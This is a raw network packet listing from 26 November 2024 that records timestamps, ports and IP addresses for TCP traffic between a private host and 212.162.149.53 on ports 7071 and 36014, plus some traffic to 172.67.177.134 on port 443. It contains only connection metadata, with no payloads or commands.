Nov 26, 2024 09:01:27.630945921 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.631031036 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.631091118 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.634668112 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.634778023 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.635023117 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.638636112 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.638760090 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.638879061 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.642421007 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.642534971 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.642760038 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.646266937 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.646385908 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.646660089 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.650170088 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.650270939 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.650333881 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.653975964 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.654097080 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.654156923 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.657839060 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.657936096 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.658144951 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.661001921 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.661072969 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.661422014 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.664829969 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.664911985 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.664964914 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.669063091 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.669167995 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.669454098 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.672955990 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.672969103 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.673013926 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.676630020 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.676697016 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.676752090 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.680299997 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.680414915 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.680510998 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.684129953 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.684264898 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.684324026 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.688847065 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.688860893 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.688910961 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.737629890 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.737792969 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.737910032 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.739495039 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.739685059 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.739748955 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.743366957 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.743484020 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.743530035 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.747385979 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.747426033 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.747483015 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.811944008 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.811975956 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.812308073 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.813133001 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.813271046 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.813324928 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.815484047 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.815609932 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.815665007 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.818145990 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.818231106 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.818517923 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.820521116 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.820662022 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.820713997 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.823518991 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.823606968 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.823663950 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.826884031 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.827007055 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.827049017 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.830219030 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.830363989 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.830425024 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.833611965 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.833801031 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.833849907 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.837003946 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.837126970 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.837183952 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.840312958 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.840387106 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.840435982 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.843617916 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.843722105 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.843796015 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.847388029 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.847594023 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.850564003 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.850639105 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.850809097 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.851520061 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.853759050 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.855035067 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.855094910 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.855175972 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.858607054 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.858743906 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.858795881 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.861804962 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.861859083 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.861860991 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.864190102 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.864212990 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.864258051 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.866286993 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.866331100 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.866360903 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.868382931 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.868505955 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.868551016 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.870477915 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.870574951 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.870630026 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.932276011 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.932373047 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.932435989 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.935551882 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.935667992 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.935715914 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.938493013 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.938601017 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.939126968 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.941068888 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.941122055 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.941169024 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.943706036 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.943799019 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.943846941 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.946997881 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.947145939 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.947194099 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.948009968 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.950413942 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.950459003 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.950536013 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.954020023 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.954066038 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.954128981 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.957186937 CET	443	49726	172.67.177.134	192.168.2.5
Nov 26, 2024 09:01:27.957221985 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.957237005 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.957279921 CET	49726	443	192.168.2.5	172.67.177.134
Nov 26, 2024 09:01:27.957324028 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.960382938 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.960434914 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.960506916 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.964082956 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.964135885 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.964190960 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.970577955 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.970630884 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.970705032 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.971611977 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.971659899 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.971695900 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.975126028 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.975182056 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.975219011 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.978843927 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.978928089 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.978951931 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.981829882 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.981869936 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.981884003 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.984185934 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.984227896 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:27.984292984 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.985184908 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:27.985229969 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.001143932 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.001332998 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.001386881 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.002139091 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.002274990 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.002322912 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.004113913 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.004221916 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.004266977 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.037761927 CET	49726	443	192.168.2.5	172.67.177.134
Nov 26, 2024 09:01:28.037791967 CET	443	49726	172.67.177.134	192.168.2.5
Nov 26, 2024 09:01:28.039082050 CET	443	49726	172.67.177.134	192.168.2.5
Nov 26, 2024 09:01:28.090768099 CET	49726	443	192.168.2.5	172.67.177.134
Nov 26, 2024 09:01:28.216469049 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.216495037 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.216531992 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.216546059 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.216557980 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.216589928 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.216597080 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.216615915 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.216650963 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.216653109 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.216662884 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.216674089 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.216686964 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.216701984 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.216715097 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.216732979 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.216737986 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.216767073 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.216768026 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.216779947 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.216799021 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.216810942 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.216829062 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.216844082 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.216881990 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.216893911 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.216906071 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.216917992 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.216929913 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.216929913 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.216944933 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.216958046 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.216959000 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.216970921 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.216978073 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.216984034 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.216998100 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.217017889 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.217019081 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.217031002 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.217040062 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.217041969 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.217052937 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.217063904 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.217073917 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.217077971 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.217086077 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.217086077 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.217097998 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.217124939 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.217139959 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.217142105 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.217152119 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.217164993 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.217176914 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.217190027 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.217197895 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.217202902 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.217219114 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.217243910 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.217263937 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.217276096 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.217309952 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.230386972 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.230412006 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.230424881 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.230495930 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.230542898 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.230556965 CET	36014	49707	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.230586052 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.278278112 CET	49707	36014	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.300813913 CET	49726	443	192.168.2.5	172.67.177.134
Nov 26, 2024 09:01:28.337791920 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.337812901 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.337878942 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.338382006 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.338573933 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.338618994 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.340636015 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.340708971 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.340751886 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.342513084 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.342601061 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.342649937 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.343334913 CET	443	49726	172.67.177.134	192.168.2.5
Nov 26, 2024 09:01:28.344469070 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.344537973 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.344582081 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.346431017 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.346668005 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.346712112 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.348427057 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.348516941 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.348556995 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.350502014 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.350598097 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.350657940 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.352443933 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.352540016 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.352579117 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.354460001 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.355003119 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.355046988 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.355093002 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.356996059 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.357032061 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.357100964 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.359020948 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.359091043 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.359149933 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.361023903 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.361061096 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.361131907 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.363039970 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.363080025 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.363123894 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.365030050 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.365082026 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.365139961 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.367044926 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.367084026 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.367141008 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.369041920 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.369136095 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.369141102 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.371045113 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.371083021 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.371149063 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.373051882 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.373086929 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.373188019 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.375041962 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.375082970 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.375139952 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.418862104 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.457923889 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.457951069 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.457988977 CET	49710	7071	192.168.2.5	212.162.149.53
Nov 26, 2024 09:01:28.458890915 CET	7071	49710	212.162.149.53	192.168.2.5
Nov 26, 2024 09:01:28.458976030 CET	7071	49710	212.162.149.53	192.168.2.5
